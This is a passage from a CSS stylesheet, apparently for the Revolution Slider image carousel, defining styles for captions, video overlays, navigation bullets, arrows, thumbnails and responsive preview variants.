	width:100%;
	position:relative;
}



/************************************************
	  - SOME CAPTION MODIFICATION AT START  -
*************************************************/
.tp-simpleresponsive .caption,
.tp-simpleresponsive .tp-caption {
	/*-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";		-moz-opacity: 0;	-khtml-opacity: 0;	opacity: 0; */
	position:absolute;visibility: hidden;
	-webkit-font-smoothing: antialiased !important;	
	
}

.tp-simpleresponsive img	{	max-width:none}



/******************************
	-	IE8 HACKS	-
*******************************/
.noFilterClass {
	filter:none !important;
}


/******************************
	-	SHADOWS		-
******************************/
.tp-bannershadow  {
		position:absolute;

		margin-left:auto;
		margin-right:auto;
		-moz-user-select: none;
        -khtml-user-select: none;
        -webkit-user-select: none;
        -o-user-select: none;
	}

.tp-bannershadow.tp-shadow1 {	background:url(../assets/shadow1.png) no-repeat; background-size:100% 100%; width:890px; height:60px; bottom:-60px}
.tp-bannershadow.tp-shadow2 {	background:url(../assets/shadow2.png) no-repeat; background-size:100% 100%; width:890px; height:60px;bottom:-60px}
.tp-bannershadow.tp-shadow3 {	background:url(../assets/shadow3.png) no-repeat; background-size:100% 100%; width:890px; height:60px;bottom:-60px}


/********************************
	-	FULLSCREEN VIDEO	-
*********************************/
.caption.fullscreenvideo {	left:0px; top:0px; position:absolute;width:100%;height:100%}
.caption.fullscreenvideo iframe,
.caption.fullscreenvideo video	{ width:100% !important; height:100% !important; display: none}

.tp-caption.fullscreenvideo	{	left:0px; top:0px; position:absolute;width:100%;height:100%}


.tp-caption.fullscreenvideo iframe,
.tp-caption.fullscreenvideo iframe video	{ width:100% !important; height:100% !important; display: none}


.fullcoveredvideo video,
.fullscreenvideo video					{	background: #000}

.fullcoveredvideo .tp-poster		{	background-position: center center;background-size: cover;width:100%;height:100%;top:0px;left:0px}

.html5vid.videoisplaying .tp-poster	{	display: none}

.tp-video-play-button		{	background:#000;
								background:rgba(0,0,0,0.3);
								padding:5px;
								border-radius:5px;-moz-border-radius:5px;-webkit-border-radius:5px;
								position: absolute;
								top: 50%;
								left: 50%;
								font-size: 40px;
								color: #FFF;
								z-index: 3;
								margin-top: -27px;
								margin-left: -28px;
								text-align: center;
								cursor: pointer;
							}

.html5vid .tp-revstop		{	width:15px;height:20px; border-left:5px solid #fff; border-right:5px solid #fff; position:relative;margin:10px 20px; box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box}
.html5vid .tp-revstop	{	display:none}
.html5vid.videoisplaying .revicon-right-dir	{	display:none}
.html5vid.videoisplaying .tp-revstop	{	display:block}

.html5vid.videoisplaying .tp-video-play-button	{	display:none}
.html5vid:hover .tp-video-play-button { display:block}

.fullcoveredvideo .tp-video-play-button	{	display:none !important}


/********************************
	-	FULLSCREEN VIDEO ENDS	-
*********************************/


/********************************
	-	DOTTED OVERLAYS	-
*********************************/
.tp-dottedoverlay						{	background-repeat:repeat;width:100%;height:100%;position:absolute;top:0px;left:0px;z-index:4}
.tp-dottedoverlay.twoxtwo				{	background:url(../assets/gridtile.png)}
.tp-dottedoverlay.twoxtwowhite			{	background:url(../assets/gridtile_white.png)}
.tp-dottedoverlay.threexthree			{	background:url(../assets/gridtile_3x3.png)}
.tp-dottedoverlay.threexthreewhite		{	background:url(../assets/gridtile_3x3_white.png)}
/********************************
	-	DOTTED OVERLAYS ENDS	-
*********************************/


/************************
	-	NAVIGATION	-
*************************/

/** BULLETS **/

.tpclear		{	clear:both}


.tp-bullets									{	z-index:1000; position:absolute;
												-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";
												-moz-opacity: 1;
												-khtml-opacity: 1;
												opacity: 1;
												-webkit-transition: opacity 0.2s ease-out; -moz-transition: opacity 0.2s ease-out; -o-transition: opacity 0.2s ease-out; -ms-transition: opacity 0.2s ease-out;-webkit-transform: translateZ(5px);
											}
.tp-bullets.hidebullets					{
												-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";
												-moz-opacity: 0;
												-khtml-opacity: 0;
												opacity: 0;
											}


.tp-bullets.simplebullets.navbar						{ 	border:1px solid #666; border-bottom:1px solid #444; background:url(../assets/boxed_bgtile.png); height:40px; padding:0px 10px; -webkit-border-radius: 5px; -moz-border-radius: 5px; border-radius: 5px }

.tp-bullets.simplebullets.navbar-old					{ 	 background:url(../assets/navigdots_bgtile.png); height:35px; padding:0px 10px; -webkit-border-radius: 5px; -moz-border-radius: 5px; border-radius: 5px }


.tp-bullets.simplebullets.round .bullet					{	cursor:pointer; position:relative;	background:url(../images/bullet.png) no-Repeat top left;	width:20px;	height:20px;  margin-right:0px; float:left; margin-top:0px; margin-left:3px}
.tp-bullets.simplebullets.round .bullet.last			{	margin-right:3px}

.tp-bullets.simplebullets.round-old .bullet				{	cursor:pointer; position:relative;	background:url(../images/bullets.png) no-Repeat bottom left;	width:23px;	height:23px;  margin-right:0px; float:left; margin-top:0px}
.tp-bullets.simplebullets.round-old .bullet.last		{	margin-right:0px}


/**	SQUARE BULLETS **/
.tp-bullets.simplebullets.square .bullet				{	cursor:pointer; position:relative;	background:url(../images/bullets2.png) no-Repeat bottom left;	width:19px;	height:19px;  margin-right:0px; float:left; margin-top:0px}
.tp-bullets.simplebullets.square .bullet.last			{	margin-right:0px}


/**	SQUARE BULLETS **/
.tp-bullets.simplebullets.square-old .bullet			{	cursor:pointer; position:relative;	background:url(../images/bullets2.png) no-Repeat bottom left;	width:19px;	height:19px;  margin-right:0px; float:left; margin-top:0px}
.tp-bullets.simplebullets.square-old .bullet.last		{	margin-right:0px}


/** navbar NAVIGATION VERSION **/
.tp-bullets.simplebullets.navbar .bullet			{	cursor:pointer; position:relative;	background:url(../images/bullet_boxed.png) no-Repeat top left;	width:18px;	height:19px;   margin-right:5px; float:left; margin-top:0px}

.tp-bullets.simplebullets.navbar .bullet.first		{	margin-left:0px !important}
.tp-bullets.simplebullets.navbar .bullet.last		{	margin-right:0px !important}



/** navbar NAVIGATION VERSION **/
.tp-bullets.simplebullets.navbar-old .bullet			{	cursor:pointer; position:relative;	background:url(../assets/navigdots.png) no-Repeat bottom left;	width:15px;	height:15px;  margin-left:5px !important; margin-right:5px !important;float:left; margin-top:10px}
.tp-bullets.simplebullets.navbar-old .bullet.first		{	margin-left:0px !important}
.tp-bullets.simplebullets.navbar-old .bullet.last		{	margin-right:0px !important}


.tp-bullets.simplebullets .bullet:hover,
.tp-bullets.simplebullets .bullet.selected				{	background-position:top left}

.tp-bullets.simplebullets.round .bullet:hover,
.tp-bullets.simplebullets.round .bullet.selected,
.tp-bullets.simplebullets.navbar .bullet:hover,
.tp-bullets.simplebullets.navbar .bullet.selected		{	background-position:bottom left}



/*************************************
	-	TP ARROWS 	-
**************************************/
.tparrows												{	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";
															-moz-opacity: 1;
															-khtml-opacity: 1;
															opacity: 1;
															-webkit-transition: opacity 0.2s ease-out; -moz-transition: opacity 0.2s ease-out; -o-transition: opacity 0.2s ease-out; -ms-transition: opacity 0.2s ease-out;
															-webkit-transform: translateZ(5000px);
															-webkit-transform-style: flat;
															-webkit-backface-visibility: hidden;
															z-index:600;
															position: relative;

														}
.tparrows.hidearrows									{
															-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";
															-moz-opacity: 0;
															-khtml-opacity: 0;
															opacity: 0;
														}
.tp-leftarrow{	
	z-index:100;cursor:pointer; position:relative;	
	background:url(../assets/large_left.png) no-Repeat top left;	
	width:40px;	height:40px;   
}
.tp-rightarrow	{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/large_right.png) no-Repeat top left;	width:40px;	height:40px;   }


.tp-leftarrow.round										{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/small_left.png) no-Repeat top left;	width:19px;	height:14px;  margin-right:0px; float:left; margin-top:0px;	}
.tp-rightarrow.round									{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/small_right.png) no-Repeat top left;	width:19px;	height:14px;  margin-right:0px; float:left;	margin-top:0px}


.tp-leftarrow.round-old									{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/arrow_left.png) no-Repeat top left;	width:26px;	height:26px;  margin-right:0px; float:left; margin-top:0px;	}
.tp-rightarrow.round-old								{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/arrow_right.png) no-Repeat top left;	width:26px;	height:26px;  margin-right:0px; float:left;	margin-top:0px}


.tp-leftarrow.navbar									{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/small_left_boxed.png) no-Repeat top left;	width:20px;	height:15px;   float:left;	margin-right:6px; margin-top:12px}
.tp-rightarrow.navbar									{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/small_right_boxed.png) no-Repeat top left;	width:20px;	height:15px;   float:left;	margin-left:6px; margin-top:12px}


.tp-leftarrow.navbar-old{	
	z-index:100;cursor:pointer; position:relative;	
	background:url(../assets/arrowleft.png) no-Repeat top left;		
	width:9px;	height:16px;   float:left;	margin-right:6px; margin-top:10px}
.tp-rightarrow.navbar-old{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/arrowright.png) no-Repeat top left;	width:9px;	height:16px;   float:left;	margin-left:6px; margin-top:10px}

.tp-leftarrow.navbar-old.thumbswitharrow				{	margin-right:10px}
.tp-rightarrow.navbar-old.thumbswitharrow				{	margin-left:0px}

.tp-leftarrow.square									{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/arrow_left2.png) no-Repeat top left;	width:12px;	height:17px;   float:left;	margin-right:0px; margin-top:0px}
.tp-rightarrow.square									{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/arrow_right2.png) no-Repeat top left;	width:12px;	height:17px;   float:left;	margin-left:0px; margin-top:0px}


.tp-leftarrow.square-old								{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/arrow_left2.png) no-Repeat top left;	width:12px;	height:17px;   float:left;	margin-right:0px; margin-top:0px}
.tp-rightarrow.square-old								{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/arrow_right2.png) no-Repeat top left;	width:12px;	height:17px;   float:left;	margin-left:0px; margin-top:0px}


.tp-leftarrow.default{	
	z-index:100;cursor:pointer; position:relative;	
	background: url(../images/prev.png) no-Repeat 0 0;	
	width:57px;	height:50px;
	
	-webkit-transition: all 200ms linear;
   -moz-transition: all 200ms linear;
	-ms-transition: all 200ms linear;
   -o-transition:all 200ms linear;
	transition:all 200ms linear;
}
.tp-rightarrow.default{	
	z-index:100;cursor:pointer; position:relative;	
	background:url(../images/next.png) no-Repeat 0 0;	
	width:57px;	height:50px;
	
	-webkit-transition: all 200ms linear;
   -moz-transition: all 200ms linear;
	-ms-transition: all 200ms linear;
   -o-transition:all 200ms linear;
	transition:all 200ms linear;
}

#index_3_slider .tp-leftarrow.default{
	background: url(../images/prev-dark.png) no-Repeat 0 0;
}
#index_3_slider .tp-rightarrow.default{		
	background:url(../images/next-dark.png) no-Repeat 0 0;	
}


.tp-leftarrow:hover,
.tp-rightarrow:hover,
#index_3_slider .tp-leftarrow:hover,
#index_3_slider .tp-rightarrow:hover {	
	background-position:bottom left;
}






/****************************************************************************************************
	-	TP THUMBS 	-
*****************************************************************************************************

 - tp-thumbs & tp-mask Width is the width of the basic Thumb Container (500px basic settings)

 - .bullet width & height is the dimension of a simple Thumbnail (basic 100px x 50px)

 *****************************************************************************************************/


.tp-bullets.tp-thumbs						{	z-index:1000; position:absolute; padding:3px;background-color:#fff;
												width:500px;height:50px; 			/* THE DIMENSIONS OF THE THUMB CONTAINER */
												margin-top:-50px;
											}


.fullwidthbanner-container .tp-thumbs		{  padding:3px}

.tp-bullets.tp-thumbs .tp-mask				{	width:500px; height:50px;  			/* THE DIMENSIONS OF THE THUMB CONTAINER */
												overflow:hidden; position:relative}


.tp-bullets.tp-thumbs .tp-mask .tp-thumbcontainer	{	width:5000px; position:absolute}

.tp-bullets.tp-thumbs .bullet				{   width:100px; height:50px; 			/* THE DIMENSION OF A SINGLE THUMB */
												cursor:pointer; overflow:hidden;background:none;margin:0;float:left;
												-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=50)";
												/*filter: alpha(opacity=50);	*/
												-moz-opacity: 0.5;
												-khtml-opacity: 0.5;
												opacity: 0.5;

												-webkit-transition: all 0.2s ease-out; -moz-transition: all 0.2s ease-out; -o-transition: all 0.2s ease-out; -ms-transition: all 0.2s ease-out;
											}


.tp-bullets.tp-thumbs .bullet:hover,
.tp-bullets.tp-thumbs .bullet.selected		{ 	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";

												-moz-opacity: 1;
												-khtml-opacity: 1;
												opacity: 1;
											}
.tp-thumbs img								{	width:100%}


/************************************
		-	TP BANNER TIMER		-
*************************************/
.tp-bannertimer								{	width:100%; height:10px; /*background:url(../images/timer.png);*/position:absolute; z-index:200;top:0px}
.tp-bannertimer.tp-bottom					{	bottom:0px;height:5px; top:auto}




/***************************************
	-	RESPONSIVE SETTINGS 	-
****************************************/




    @media only screen and (min-width: 0px) and (max-width: 479px) {
				.responsive .tp-bullets	{	display:none}
				.responsive .tparrows	{	display:none}
	}





/*********************************************

	-	BASIC SETTINGS FOR THE BANNER	-

***********************************************/

 .tp-simpleresponsive img {
		-moz-user-select: none;
        -khtml-user-select: none;
        -webkit-user-select: none;
        -o-user-select: none;
}



.tp-simpleresponsive a{	text-decoration:none}

.tp-simpleresponsive ul {
	list-style:none;
	padding:0;
	margin:0;
}

.tp-simpleresponsive >ul >li{
	list-stye:none;
	position:absolute;
	visibility:hidden;
}
/*  CAPTION SLIDELINK   **/
.caption.slidelink a div,
.tp-caption.slidelink a div {	width:3000px; height:1500px;  background:url(../assets/coloredbg.png) repeat}

.tp-caption.slidelink a span	{	background:url(../assets/coloredbg.png) repeat}



/*****************************************
	-	NAVIGATION FANCY EXAMPLES	-
*****************************************/

.tparrows .tp-arr-imgholder								{ display: none}
.tparrows .tp-arr-titleholder							{ display: none}



/*****************************************
	-	NAVIGATION FANCY EXAMPLES	-
*****************************************/

/* NAVIGATION PREVIEW 1 */
.tparrows.preview1 							{	width:100px;height:100px;-webkit-transform-style: preserve-3d; -webkit-perspective: 1000; -moz-perspective: 1000; -webkit-backface-visibility: hidden; -moz-backface-visibility: hidden;background: transparent}
.tparrows.preview1:after					{	position:absolute; left:0px;top:0px; font-family: "revicons"; color:#fff; font-size:30px; width:100px;height:100px;text-align: center; background:#fff;background:rgba(0,0,0,0.15);z-index:2;line-height:100px; -webkit-transition: background 0.3s, color 0.3s; -moz-transition: background 0.3s, color 0.3s; transition: background 0.3s, color 0.3s}
.tp-rightarrow.preview1:after				{	content: '\e825';  }
.tp-leftarrow.preview1:after				{	content: '\e824';  }

.tparrows.preview1:hover:after 				{	background:rgba(255,255,255,1); color:#aaa}

.tparrows.preview1 .tp-arr-imgholder 		{	background-size:cover; background-position:center center; display:block;width:100%;height:100%;position:absolute;top:0px;
												-webkit-transition: -webkit-transform 0.3s;
												transition: transform 0.3s;
												-webkit-backface-visibility: hidden;
												backface-visibility: hidden;
											}
/*.tparrows.preview1 .tp-arr-iwrapper			{	  -webkit-transition: all 0.3s;transition: all 0.3s;
												-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";filter: alpha(opacity=0);-moz-opacity: 0.0;-khtml-opacity: 0.0;opacity: 0.0}
.tparrows.preview1:hover .tp-arr-iwrapper	{	  -ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";filter: alpha(opacity=100);-moz-opacity: 1;-khtml-opacity: 1;opacity: 1}*/


.tp-rightarrow.preview1 .tp-arr-imgholder	{	right:100%;
												-webkit-transform: rotateY(-90deg);
												transform: rotateY(-90deg);
												-webkit-transform-origin: 100% 50%;
												transform-origin: 100% 50%;
												  -ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";filter: alpha(opacity=0);-moz-opacity: 0.0;-khtml-opacity: 0.0;opacity: 0.0;



											}
.tp-leftarrow.preview1 .tp-arr-imgholder	{	left:100%;
												-webkit-transform: rotateY(90deg);
												transform: rotateY(90deg);
												-webkit-transform-origin: 0% 50%;
												transform-origin: 0% 50%;
												  -ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";filter: alpha(opacity=0);-moz-opacity: 0.0;-khtml-opacity: 0.0;opacity: 0.0;



											}


.tparrows.preview1:hover .tp-arr-imgholder	{	-webkit-transform: rotateY(0deg);
												transform: rotateY(0deg);
												  -ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";filter: alpha(opacity=100);-moz-opacity: 1;-khtml-opacity: 1;opacity: 1;

											}


	@media only screen and (min-width: 768px) and (max-width: 979px) {
		.tparrows.preview1,
		.tparrows.preview1:after	{	width:80px; height:80px;line-height:80px; font-size:24px}

	}

    @media only screen and (min-width: 480px) and (max-width: 767px) {
		.tparrows.preview1,
		.tparrows.preview1:after	{	width:60px; height:60px;line-height:60px;font-size:20px}

	}



    @media only screen and (min-width: 0px) and (max-width: 479px) {
		.tparrows.preview1,
		.tparrows.preview1:after	{	width:40px; height:40px;line-height:40px; font-size:12px}
    }

/* PREVIEW 1 BULLETS */

.tp-bullets.preview1 						{ 	height: 21px}
.tp-bullets.preview1 .bullet 				{	cursor: pointer;
											    position: relative !important;
											    background: rgba(0, 0, 0, 0.15) !important;
											    /*-webkit-border-radius: 10px;
											    border-radius: 10px;*/
											    -webkit-box-shadow: none;
											    -moz-box-shadow: none;
											    box-shadow: none;
											    width: 5px !important;
											    height: 5px !important;
											    border: 8px solid rgba(0, 0, 0, 0) !important;
											    display: inline-block;
											    margin-right: 5px !important;
											    margin-bottom: 0px !important;
											    -webkit-transition: background-color 0.2s, border-color 0.2s;
											    -moz-transition: background-color 0.2s, border-color 0.2s;
											    -o-transition: background-color 0.2s, border-color 0.2s;
											    -ms-transition: background-color 0.2s, border-color 0.2s;
											    transition: background-color 0.2s, border-color 0.2s;
											    float:none !important;
											    box-sizing:content-box;
												-moz-box-sizing:content-box;
												-webkit-box-sizing:content-box;
}
.tp-bullets.preview1 .bullet.last 			{	margin-right: 0px}
.tp-bullets.preview1 .bullet:hover,
.tp-bullets.preview1 .bullet.selected 		{	-webkit-box-shadow: none;
											    -moz-box-shadow: none;
											    box-shadow: none;
												background: #aaa !important;
												width: 5px !important;
											    height: 5px !important;
											    border: 8px solid rgba(255, 255, 255, 1) !important;
}




/* NAVIGATION PREVIEW 2 */
.tparrows.preview2 {	
	min-width:50px; 
	min-height:50px;
	border:1px solid #fff;  
	-webkit-transition: -webkit-transform 1.3s;
	-webkit-transition: width 0.3s, background-color 0.3s, opacity 0.3s;
	transition: width 0.3s, background-color 0.3s, opacity 0.3s;
}
.tparrows.preview2:after{	
	 position:absolute; 
	 top:50%;
	 font-family:'FontAwesome'; 
	 color:#fff;  
	 margin-top: -12px; 
	 -webkit-transition: color 0.3s; 
	 -moz-transition: color 0.3s; 
	 transition: color 0.3s; 
}
.tp-rightarrow.preview2:after	{content: '\f178';  right:18px}
.tp-leftarrow.preview2:after{content: '\f177';  left:18px}


/*.tparrows.preview2 .tp-arr-titleholder{	
	background-size:cover; background-position:center center; display:block; visibility:hidden;position:relative;top:0px;
												-webkit-transition: -webkit-transform 0.3s;
												transition: transform 0.3s;
												-webkit-backface-visibility: hidden;
												backface-visibility: hidden;
												white-space: nowrap;
												color: #000;
												text-transform: uppercase;
												font-weight: 400;
												font-size: 14px;
												line-height: 60px;
												padding:0px 10px;
											}

.tp-rightarrow.preview2 .tp-arr-titleholder	{	 right:50px;
												-webkit-transform: translateX(-100%);
												transform: translateX(-100%);
											}
.tp-leftarrow.preview2 .tp-arr-titleholder	{	left:50px;
												-webkit-transform: translateX(100%);
												transform: translateX(100%);
											}*/

.tparrows.preview2.hovered{}
.tparrows.preview2:hover{	
	background:#07aaa5; 
	border:1px solid #07aaa5; 
}
.tparrows.preview2:hover:after{
	color:#fff;
}
/*.tparrows.preview2:hover .tp-arr-titleholder{	-webkit-transform: translateX(0px);
													transform: translateX(0px);
													visibility: visible;
													position: absolute;
											}*/
											
											
											

/* PREVIEW 2 BULLETS */

.tp-bullets.preview2 						{ 	height: 17px; display:none;}
.tp-bullets.preview2 .bullet 				{	cursor: pointer;
											    position: relative !important;
											    background: rgba(0, 0, 0, 0.5) !important;
											    -webkit-border-radius: 10px;
											    border-radius: 10px;
											    -webkit-box-shadow: none;
											    -moz-box-shadow: none;
											    box-shadow: none;
											    width: 6px !important;
											    height: 6px !important;
											    border: 5px solid rgba(0, 0, 0, 0) !important;
											    display: inline-block;
											    margin-right: 2px !important;
											    margin-bottom: 0px !important;
											    -webkit-transition: background-color 0.2s, border-color 0.2s;
											    -moz-transition: background-color 0.2s, border-color 0.2s;
											    -o-transition: background-color 0.2s, border-color 0.2s;
											    -ms-transition: background-color 0.2s, border-color 0.2s;
											    transition: background-color 0.2s, border-color 0.2s;
											    float:none !important;
											    box-sizing:content-box;
												-moz-box-sizing:content-box;
												-webkit-box-sizing:content-box;
}
.tp-bullets.preview2 .bullet.last 			{	margin-right: 0px}
.tp-bullets.preview2 .bullet:hover,
.tp-bullets.preview2 .bullet.selected 		{	-webkit-box-shadow: none;
											    -moz-box-shadow: none;
											    box-shadow: none;
												background: rgba(255, 255, 255, 1) !important;
												width: 6px !important;
											    height: 6px !important;
											    border: 5px solid rgba(0, 0, 0, 1) !important;
}

.tp-arr-titleholder.alwayshidden			{	display:none !important}


	@media only screen and (min-width: 768px) and (max-width: 979px) {
		.tparrows.preview2 {	min-width:40px; min-height:40px; width:40px;height:40px;
								border-radius:20px;-moz-border-radius:20px;-webkit-border-radius:20px;
							}
		.tparrows.preview2:after					{	position:absolute; top:50%; font-family: "revicons"; font-size:20px; margin-top: -12px}
		.tp-rightarrow.preview2:after				{	content: '\e81e';  right:11px}
		.tp-leftarrow.preview2:after				{	content: '\e81f';  left:11px}
		.tparrows.preview2 .tp-arr-titleholder		{	font-size:12px; line-height:40px; letter-spacing: 0px}
		.tp-rightarrow.preview2 .tp-arr-titleholder	{	right:35px}
		.tp-leftarrow.preview2 .tp-arr-titleholder	{	left:35px}

	}

    @media only screen and (min-width: 480px) and (max-width: 767px) {
   		 .tparrows.preview2 						{	min-width:30px; min-height:30px; width:30px;height:30px;
														border-radius:15px;-moz-border-radius:15px;-webkit-border-radius:15px;
													}
		.tparrows.preview2:after					{	position:absolute; top:50%; font-family: "revicons"; font-size:14px; margin-top: -12px}
		.tp-rightarrow.preview2:after				{	content: '\e81e';  right:8px}
		.tp-leftarrow.preview2:after				{	content: '\e81f';  left:8px}
		.tparrows.preview2 .tp-arr-titleholder		{	font-size:10px; line-height:30px; letter-spacing: 0px}
		.tp-rightarrow.preview2 .tp-arr-titleholder	{	right:25px}
		.tp-leftarrow.preview2 .tp-arr-titleholder	{	left:25px}
		.tparrows.preview2 .tp-arr-titleholder		{	display:none;visibility:none}


	}

    @media only screen and (min-width: 0px) and (max-width: 479px) {
		.tparrows.preview2 							{	min-width:30px; min-height:30px; width:30px;height:30px;
														border-radius:15px;-moz-border-radius:15px;-webkit-border-radius:15px;
													}
		.tparrows.preview2:after					{	position:absolute; top:50%; font-family: "revicons"; font-size:14px; margin-top: -12px}
		.tp-rightarrow.preview2:after				{	content: '\e81e';  right:8px}
		.tp-leftarrow.preview2:after				{	content: '\e81f';  left:8px}
		.tparrows.preview2 .tp-arr-titleholder		{	display:none;visibility:none}
		.tparrows.preview2:hover					{	width:30px !important; height:30px !important}
    }



/* NAVIGATION PREVIEW 3 */
.tparrows.preview3 							{	width:70px; height:70px; background:#fff; background:rgba(255,255,255,1); -webkit-transform-style: flat}
.tparrows.preview3:after					{	position:absolute;  line-height: 70px;text-align: center; font-family: "revicons"; color:#aaa; font-size:30px; top:0px;left:0px;;background:#fff; z-index:100; width:70px;height:70px; -webkit-transition: color 0.3s; -moz-transition: color 0.3s; transition: color 0.3s}
.tparrows.preview3:hover:after					{	color:#000}
.tp-rightarrow.preview3:after				{	content: '\e825';  }
.tp-leftarrow.preview3:after				{	content: '\e824';  }


.tparrows.preview3 .tp-arr-iwrapper			{
												  -webkit-transform: scale(0,1);
												  transform: scale(0,1);
												  -webkit-transform-origin: 100% 50%;
												  transform-origin: 100% 50%;
												  -webkit-transition: -webkit-transform 0.2s;
												  transition: transform 0.2s;
												  z-index:0;position: absolute; background: #000; background: rgba(0,0,0,0.75);
												  display: table;min-height:90px;top:-10px}

.tp-leftarrow.preview3 .tp-arr-iwrapper		{	 -webkit-transform: scale(0,1);
												  transform: scale(0,1);
												  -webkit-transform-origin: 0% 50%;
												  transform-origin: 0% 50%;
											}

.tparrows.preview3 .tp-arr-imgholder 		{	display:block;background-size:cover; background-position:center center; display:table-cell;min-width:90px;height:90px;
												position:relative;top:0px}

.tp-rightarrow.preview3 .tp-arr-iwrapper	{	right:0px;padding-right:70px}
.tp-leftarrow.preview3 .tp-arr-iwrapper		{	left:0px; direction: rtl;padding-left:70px}
.tparrows.preview3 .tp-arr-titleholder		{	display:table-cell; padding:30px;font-size:16px; color:#fff;white-space: nowrap; position: relative; clear:right;vertical-align: middle}

.tparrows.preview3:hover .tp-arr-iwrapper	{
												-webkit-transform: scale(1,1);
												  transform: scale(1,1);

											}

/* PREVIEW 3 BULLETS */
.tp-bullets.preview3 						{ 	height: 17px}
.tp-bullets.preview3 .bullet 				{	cursor: pointer;
											    position: relative !important;
											    background: rgba(0, 0, 0, 0.5) !important;
											    -webkit-border-radius: 10px;
											    border-radius: 10px;
											    -webkit-box-shadow: none;
											    -moz-box-shadow: none;
											    box-shadow: none;
											    width: 6px !important;
											    height: 6px !important;
											    border: 5px solid rgba(0, 0, 0, 0) !important;
											    display: inline-block;
											    margin-right: 2px !important;
											    margin-bottom: 0px !important;
											    -webkit-transition: background-color 0.2s, border-color 0.2s;
											    -moz-transition: background-color 0.2s, border-color 0.2s;
											    -o-transition: background-color 0.2s, border-color 0.2s;
											    -ms-transition: background-color 0.2s, border-color 0.2s;
											    transition: background-color 0.2s, border-color 0.2s;
											    float:none !important;
											    box-sizing:content-box;
												-moz-box-sizing:content-box;
												-webkit-box-sizing:content-box;
}
.tp-bullets.preview3 .bullet.last 			{	margin-right: 0px}
.tp-bullets.preview3 .bullet:hover,
.tp-bullets.preview3 .bullet.selected 		{	-webkit-box-shadow: none;
											    -moz-box-shadow: none;
											    box-shadow: none;
												background: rgba(255, 255, 255, 1) !important;
												width: 6px !important;
											    height: 6px !important;
											    border: 5px solid rgba(0, 0, 0, 1) !important;
}


	@media only screen and (min-width: 768px) and (max-width: 979px) {
		.tparrows.preview3:after,
		.tparrows.preview3 							{	width:50px; height:50px; line-height:50px;font-size:20px}
		.tparrows.preview3 .tp-arr-iwrapper			{	min-height:70px}
		.tparrows.preview3 .tp-arr-imgholder 		{	min-width:70px;height:70px}
		.tp-rightarrow.preview3 .tp-arr-iwrapper	{	padding-right:50px}
		.tp-leftarrow.preview3 .tp-arr-iwrapper		{	padding-left:50px}
		.tparrows.preview3 .tp-arr-titleholder		{	padding:10px;font-size:16px}



	}

    @media only screen  and (max-width: 767px) {

		.tparrows.preview3:after,
		.tparrows.preview3 							{	width:50px; height:50px; line-height:50px;font-size:20px}
		.tparrows.preview3 .tp-arr-iwrapper			{	min-height:70px}
	}





/* NAVIGATION PREVIEW 4 */
.tparrows.preview4 							{	width:30px; height:110px;  background:transparent;-webkit-transform-style: preserve-3d; -webkit-perspective: 1000; -moz-perspective: 1000}
.tparrows.preview4:after					{	position:absolute;  line-height: 110px;text-align: center; font-family: "revicons"; color:#fff; font-size:20px; top:0px;left:0px;z-index:0; width:30px;height:110px; background: #000; background: rgba(0,0,0,0.25);
												-webkit-transition: all 0.2s ease-in-out;
											    -moz-transition: all 0.2s ease-in-out;
											    -o-transition: all 0.2s ease-in-out;
											    transition: all 0.2s ease-in-out;
												   -ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";filter: alpha(opacity=100);-moz-opacity: 1;-khtml-opacity: 1;opacity: 1;

											}

.tp-rightarrow.preview4:after				{	content: '\e825';  }
.tp-leftarrow.preview4:after				{	content: '\e824';  }


.tparrows.preview4 .tp-arr-allwrapper		{	visibility:hidden;width:180px;position: absolute;z-index: 1;min-height:120px;top:0px;left:-150px; overflow: hidden;-webkit-perspective: 1000px;-webkit-transform-style: flat}

.tp-leftarrow.preview4 .tp-arr-allwrapper	{	left:0px}
.tparrows.preview4 .tp-arr-iwrapper			{	position: relative}

.tparrows.preview4 .tp-arr-imgholder 		{	display:block;background-size:cover; background-position:center center;width:180px;height:110px;
												position:relative;top:0px;

												-webkit-backface-visibility: hidden;
												backface-visibility: hidden;



											}


.tparrows.preview4 .tp-arr-imgholder2 		{	display:block;background-size:cover; background-position:center center; width:180px;height:110px;
												position:absolute;top:0px; left:180px;
												-webkit-backface-visibility: hidden;
												backface-visibility: hidden;

											}

.tp-leftarrow.preview4 .tp-arr-imgholder2 	{	left:-180px}




.tparrows.preview4 .tp-arr-titleholder		{	display:block; font-size:12px; line-height:25px; padding:0px 10px;text-align:left;color:#fff; position: relative;
												background: #000;
												color: #FFF;
												text-transform: uppercase;
												white-space: nowrap;
												letter-spacing: 1px;
												font-weight: 700;
												font-size: 11px;
												line-height: 2.75;
												-webkit-transition: all 0.3s;
												transition: all 0.3s;
												-webkit-transform: rotateX(-90deg);
												transform: rotateX(-90deg);
												-webkit-transform-origin: 50% 0;
												transform-origin: 50% 0;
												-webkit-backface-visibility: hidden;
												backface-visibility: hidden;
												  -ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";filter: alpha(opacity=0);-moz-opacity: 0.0;-khtml-opacity: 0.0;opacity: 0.0;


}



